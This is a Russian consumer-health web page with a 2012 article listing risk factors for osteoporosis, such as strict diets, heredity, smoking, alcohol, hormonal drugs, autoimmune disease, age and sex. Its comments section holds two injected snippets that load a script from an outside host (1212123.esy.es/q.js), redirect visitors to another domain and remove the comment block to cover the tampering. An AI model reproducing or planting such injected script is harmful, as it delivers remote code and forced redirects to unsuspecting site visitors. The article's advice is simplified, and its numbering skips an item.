Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Факторы риска остеопороза  >>  Факторы риска остеопороза
 
Обратная связь
 

Факторы риска остеопороза

Размер шрифта
20 сентября 2012 00:00
Юрий Малышев
Здоровье инфо
Виктория Ткаченко
Здоровье инфо
  • google_analytics: false
  • Нравится

Костную систему недаром называют опорной. Однако, начиная с 30-40 лет, костная ткань становится менее плотной,  и это может привести к серьезным проблемам, таким, как частые переломы.

остеопороз

Что делает наш скелет слабым и уязвимым? Наша статья о том, что увеличивает риск остеопороза.

1. Строгая диета, отсутствие полноценного питания

Жесткая диета, полный отказ от еды с целью похудеть, оказывается, может «отозваться» позже остеопорозом. Голод не проходит для организма бесследно, он нарушает выработку женских половых гормонов. В итоге кости размягчаются и повышается риск травм.

Употребляйте стакан молока в день, и вы получите эффективную профилактику остеопороза. Молоко содержит кальций и витамин D – главные компоненты, отвечающие за прочность костей.

2. Плохая наследственность

Семейная предрасположенность к остеопорозу – важный фактор. Обратите внимание на такие нюансы, как плохая осанка, частые переломы в пожилом возрасте. Также имейте в виду, что ранняя менопауза у ближайших родственниц и низкий уровень женских половых гормонов эстрогенов тоже является пусковым механизмом в развитии остеопороза.

3. Курение

Согласно результатам исследований, курение напрямую связано с развитием остеопороза. Вредная привычка пагубно сказывается на работе всех органов, в том числе и на здоровье костей.

4. Употребление алкоголя

Очередное доказательство того, что алкоголь вреден: он вымывает кальций и другие минералы из костей. Чем больше алкоголя, тем меньше микроэлементов в костях. Женщины более уязвимы, чем мужчины, так как более восприимчивы к действию алкоголя.

5. Гормональные препараты

Преднизолон, другие кортикостероиды, препараты гормона щитовидной железы, а также антидепрессанты провоцируют потерю костями кальция и витамина D.

6. Аутоиммунные заболевания: волчанка, ревматоидный артрит, болезнь Крона

Ученые доказали, что люди с аутоиммунными заболеваниями, чаще страдают остеопорозом, который развивается в таком случае достаточно быстрыми темпами.

7. Возраст

Возраст, к сожалению, тоже является фактором риска. С годами кости теряют свою прочность. Остеопороз часто развивается у мужчин, однако для женщин он представляет серьезную угрозу в период наступления менопаузы.

В 30-40 лет предшествовать остеопорозу может остеопения – размягчение костей, возникающее, например, из-за плохого питания или диет.

9. Пол

Женщины из-за гормональных перестроек во время менопаузы имеют более высокий риск развития остеопороза, чем мужчины. Причина – снижение уровня полового гормона эстрогена.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Обычный чай переломает вам ноги!   Ритм марша лечит болезнь Паркинсона   Что морщины расскажут о вас   Женщины, которые пьют больше 3-х стаканов молока в день, умрут раньше остальных!  
25 апреля 2013Оказывается, не все молочные продукты хороши для костей! А некоторые вообще портят кости! 19 декабря 2012Газированные напитки увеличивают риск артрита
 
29 ноября 2012Ученые победили мышечную слабость 20 ноября 2012Женский мозг может стать мужским
 

Слайдшоу

1
Супереда для костей
Супереда для костей
Супереда для ваших костей

Тесты

1
Есть ли у вас остеопороз?
Есть ли у вас гормональные нарушения
Что вы знаете о мышцах?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.